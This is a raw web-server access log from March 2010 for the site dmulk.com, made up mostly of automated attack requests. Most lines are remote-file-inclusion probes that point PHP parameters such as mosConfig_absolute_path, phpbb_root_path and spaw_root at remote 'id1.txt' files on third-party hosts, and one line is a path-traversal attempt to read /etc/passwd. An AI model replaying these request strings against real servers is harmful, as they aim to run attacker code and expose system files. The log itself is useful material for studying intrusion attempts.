211.47.237.17 - - [12/Mar/2010:10:07:07 -0800] "GET /logs/access_080501.log//modules/agendax/addevent.inc.php?agendax_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:10:07:11 -0800] "GET /logs/access_090504.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:10:07:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:10:07:11 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:10:07:11 -0800] "GET /////includes/functions_admin.php?phpbb_root_path=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:10:07:11 -0800] "GET /logs/access_080708.log%20%20//////includes/functions_admin.php?phpbb_root_path=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:07:11 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:07:11 -0800] "GET /logs/access_080327.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:07:11 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:07:17 -0800] "GET /logs/access_090411.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:07:17 -0800] "GET /logs/access_090411.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
194.109.22.115 - - [12/Mar/2010:10:07:26 -0800] "GET /logs/access_090617.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:07:27 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:07:27 -0800] "GET /logs/access_090707.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:07:27 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:07:32 -0800] "GET /logs/access_090428.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:10:07:35 -0800] "GET /logs/access_090223.log/?mosConfig_absolute_path=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:10:07:35 -0800] "GET /?mosConfig_absolute_path=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 200 15134 "-" "libwww-perl/5.831" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:10:07:36 -0800] "GET /logs/?mosConfig_absolute_path=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 200 142813 "-" "libwww-perl/5.831" "www.dmulk.com"
209.197.232.13 - - [12/Mar/2010:10:07:40 -0800] "GET /logs/access_091125.log/appserv/main.php?appserv_root=http://www.la-contemporaine.fr/IMG/arton100.png? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.247.160.130 - - [12/Mar/2010:10:07:43 -0800] "GET /logs/access_090707.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.247.160.130 - - [12/Mar/2010:10:07:43 -0800] "GET /logs/access_090725.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.247.160.130 - - [12/Mar/2010:10:07:43 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.247.160.130 - - [12/Mar/2010:10:07:43 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:07:45 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:07:45 -0800] "GET /logs/access_100122.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:07:45 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:07:46 -0800] "GET /logs/access_090303.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.221 - - [12/Mar/2010:10:07:46 -0800] "GET /logs/access_081023.log HTTP/1.0" 200 4973677 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
125.247.160.130 - - [12/Mar/2010:10:07:47 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.247.160.130 - - [12/Mar/2010:10:07:47 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.247.160.130 - - [12/Mar/2010:10:07:48 -0800] "GET /logs/access_090725.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.247.160.130 - - [12/Mar/2010:10:07:48 -0800] "GET /logs/access_090707.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:10:07:53 -0800] "GET /logs/access_090925.log//skin/zero_vote/error.php?dir=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:07:57 -0800] "GET /skin/zero_vote/error.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:07:57 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [12/Mar/2010:10:07:57 -0800] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.1" 200 1068632 "-" "-" "www.dmulk.com"
194.109.22.115 - - [12/Mar/2010:10:07:57 -0800] "GET /logs/access_090610.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:07:58 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.224 - - [12/Mar/2010:10:07:58 -0800] "GET /blog/index.php/2009/04/12/crestline-adv-riding-04102009-04122009/ HTTP/1.0" 200 3454 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:07:59 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:00 -0800] "GET /skin/zero_vote/error.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:00 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:08:00 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:08:00 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:08:00 -0800] "GET /logs/access_090227.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:08:00 -0800] "GET /logs/access_090530.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:10:08:01 -0800] "GET /logs/access_100209.log/?_SERVER[DOCUMENT_ROOT]=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:10:08:01 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 200 142813 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:10:08:02 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 200 15151 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:10:08:02 -0800] "GET /logs/access_091006.log/?_SERVER[DOCUMENT_ROOT]=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:03 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:03 -0800] "GET /logs/access_081009.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:03 -0800] "GET /logs/access_091125.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:03 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 200 15076 "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:08:05 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:08:05 -0800] "GET /logs/access_090227.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:08:05 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:08:05 -0800] "GET /logs/access_090530.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.7.71 - - [12/Mar/2010:10:08:06 -0800] "GET /logs/access_090820.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:10 -0800] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:08:10 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:08:10 -0800] "GET /logs/access_080501.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:08:10 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:16 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:16 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:17 -0800] "GET /skin/zero_vote/error.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
12.10.157.29 - - [12/Mar/2010:10:08:22 -0800] "GET /logs/index.php?pagina=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [12/Mar/2010:10:08:24 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.9.1; http://dmulk.com/blog" "dmulk.com"
12.10.157.29 - - [12/Mar/2010:10:08:24 -0800] "GET /index.php?pagina=http://maniacos.net/_vti_text?? HTTP/1.1" 200 14969 "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:08:25 -0800] "GET /errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:08:25 -0800] "GET /logs/access_080717.log%20%20/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:08:25 -0800] "GET /logs/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:10:08:27 -0800] "GET /logs/access_081009.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [12/Mar/2010:10:08:30 -0800] "GET /logs/access_090523.log%20%20/myevent.php?myevent_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:10:08:30 -0800] "GET /logs/access_100209.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:10:08:31 -0800] "GET /logs/access_091006.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:10:08:31 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 200 142813 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:10:08:31 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 200 15150 "-" "Mozilla/5.0" "www.dmulk.com"
12.10.157.29 - - [12/Mar/2010:10:08:32 -0800] "GET /logs/access_090614.log%20%20/index.php?pagina=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:08:33 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:08:33 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:08:34 -0800] "GET /logs/access_090626.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:41 -0800] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:45 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:45 -0800] "GET /logs/access_080619.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:45 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:46 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:46 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:46 -0800] "GET /logs/access_080619.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:08:50 -0800] "GET /logs/access_090203.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:08:56 -0800] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
221.141.1.113 - - [12/Mar/2010:10:09:07 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
221.141.1.113 - - [12/Mar/2010:10:09:07 -0800] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
221.141.1.113 - - [12/Mar/2010:10:09:07 -0800] "GET /logs/access_080914.log%20%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:10:09:12 -0800] "GET /index2.php?lang=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:09:15 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:09:15 -0800] "GET /logs/access_090428.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:09:15 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:10:09:33 -0800] "GET /logs/access_100206.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
221.141.1.113 - - [12/Mar/2010:10:09:34 -0800] "GET /logs/access_090717.log%20%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:09:51 -0800] "GET /logs/access_090820.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:09:55 -0800] "GET /logs/access_090713.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:10:05 -0800] "GET /logs/access_080320.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:10:08 -0800] "GET /logs/access_080327.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:10:08 -0800] "GET /logs/access_090411.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:10:10:13 -0800] "GET /logs/access_090120.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:10:10:13 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:10:10:13 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:10:10:17 -0800] "GET /logs/access_090530.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:10:10:26 -0800] "GET /logs//cal//tools/send_reminders.php?noSet=0&includedir=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
